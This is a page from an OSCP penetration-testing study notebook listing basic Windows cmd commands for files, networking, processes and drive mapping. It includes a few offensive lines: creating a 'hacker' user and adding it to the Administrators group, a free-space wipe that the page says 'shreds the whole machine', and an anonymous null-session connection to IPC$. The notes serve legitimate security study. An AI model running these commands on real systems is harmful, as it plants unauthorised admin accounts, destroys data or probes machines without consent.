OSCP
  • All About OSCP
  • OSCP- One Page Repository
  • About the Author
  • Basic Linux & Windows Commands
    • Linux Commands
    • Windows
      • cmd
      • Powershell
      • Basics of windows
    • Linux / WindowsMain commands
    • Bash Scripting
  • Recon (Scanning & Enumeration)
    • Active Info Gathering
      • My Network Recon Checklist
      • My Web Recon Checklist
      • Network Enumeration
      • Port Scanning
    • Common Ports and Services
      • Other Services Enumeration
    • DNS Zone Transfer Attack
    • SNMP Enumeration
    • SMB Enumeration
    • Web Application Directory bruteforcing / fingerprinting
    • Port & Services Scanning
  • Web Application
    • My checklist
      • LFI
      • RFI
      • SQLI
    • File Upload bypass
    • Enumeration and Exploitation
    • No-Sql Injection
    • SQL Injection
    • Hidden Files and directories
    • RFI
    • LFI
  • Brute Force
    • Reuse the hash
    • Password Crack
  • Shells
    • Linux Reverse Shell [One liner]
    • Reverse Shell to fully interactive
    • Reverse Shell Cheat Sheet
    • WebShell
  • Transferring files
    • My Checklist
    • Transfer files on linux
  • Priv Escalation
    • Linux Priv Escalation
      • g0tmi1k linux privilege escalation
      • Privilege Escalation - Linux
      • Checklist - Linux Privilege Escalation
    • Windows Priv Escalation
      • Fuzzysecurity window priv escalation
      • Privilege Escalation - Windows
      • Checklist - Local Windows Privilege Escalation
  • Post Exploitation
    • Cover your tracks
    • Persistence
    • Loot Linux
    • Loot Windows
    • Escaping Restricted Shell
    • Meterpreter shell for post-exploitation
    • Spawn Shell
  • Pivoting
    • My Checklist for Pivoting
    • Tunneling and Port Forwarding
    • Pivotind understanding
  • Buffer Overflow
    • Buffer overflow
    • Buffer overflow Step by Step
      • Study about buffer overflow
      • Brainpan
      • VulnServer
      • Minishare
  • Main Tools
  • MISC
    • Exploit Compiling
  • CheatSheet (Short)
  • OSCP/ Vulnhub Practice learning
    • Machines Practice
    • My Practice on HTB Windows boxes
    • My Practice on Vulnhub boxes
    • Over the Wire (Natas)
    • Over The wire (Bandit)
Powered by GitBook
On this page

Was this helpful?

  1. Basic Linux & Windows Commands
  2. Windows

cmd

The equivalent to the Linux command ; as in

echo "command 1" ; echo "command 2"

is

dir & whoami

Dealing with files and stuff

Delete file

del

Create folder/directory

md folderName

Show hidden files

dir /A

Print out file content, like cat

type file.txt

grep files

findstr file.txt

Network

Show network information

netstat -an

Show network adapter info

ipconfig

Ping another machine

ping ip

Traceroute

tracert

Processes

List processes

tasklist

Kill a process

taskkill /PID 1532 /F

Users

net users

# Add user
net user hacker my_password /add
net localgroup Administrator hacker /add

# Check if you are part of a domain
net localgroup /domain

# List all users in a domain
net users /domain

Other

Shutdown

 # Shutdown now
 shutdown /s /t 0

 # Restart
 shutdown /r /t 0

ciper - Clear data/shred

 Shreds the whole machine
 ciper /w:C:\

Show environmental variables

set

Show options for commands

The "man"-pages in windows is simply:

help dir

Mounting - Mapping

In the windows world mounting is called mapping.

If you want to see which drives are mapped/mounted to your file-system you can use any of these commands:

# This is the most thorough
wmic logicaldisk get deviceid, volumename, description

# But this works too
wmic logicaldisk get name
wmic logicaldisk get caption

# This can be slow. So don't kill your shell!
fsutil fsinfo drives

# With powershell
get-psdrive -psprovider filesystem

# This works too, but it is interacive. So it might be dangerous work hackers
diskpart
list volume

# Map only network drives
net use

The command to deal with mounting/mapping is net use

Using net use we can connect to other shared folder, on other systems. Many windows machines have a default-share called IPC (Interprocess communication share). It does not contain any files. But we can usually connect to it without authentication. This is called a null-session. Although the share does not contain any files it contains a lot of data that is useful for enumeration. The Linux-equivalent of net use is usually smbclient.

net use \\IP address\IPC$ "" /u:""
net use \\ip\IPC$ "" /u:""

If you want to map a drive from another network to your filesystem you can do that like this:

# This will map it to drive z
net use z: \\192.168.1.101\SYSVOL

# This will map it to the first available drive-letter
net use * \\192.168.1.101\SYSVOL

Here you map the drive to the letter z. If the command is successful you should now be able to access those files by entering the z drive.

You enter the z-drive by doing this:

C:\>z:
Z:\

# Now we switch back to c
Z:\>c:
C:\

Remove a network drive - umount it

First leave the drive if you are in it:

c:
net use z: /del

References and Stuff

PreviousWindowsNextPowershell

Last updated 4 years ago

Was this helpful?

This might come in handy for the linux-users:

http://www.lemoda.net/windows/windows2unix/windows2unix.html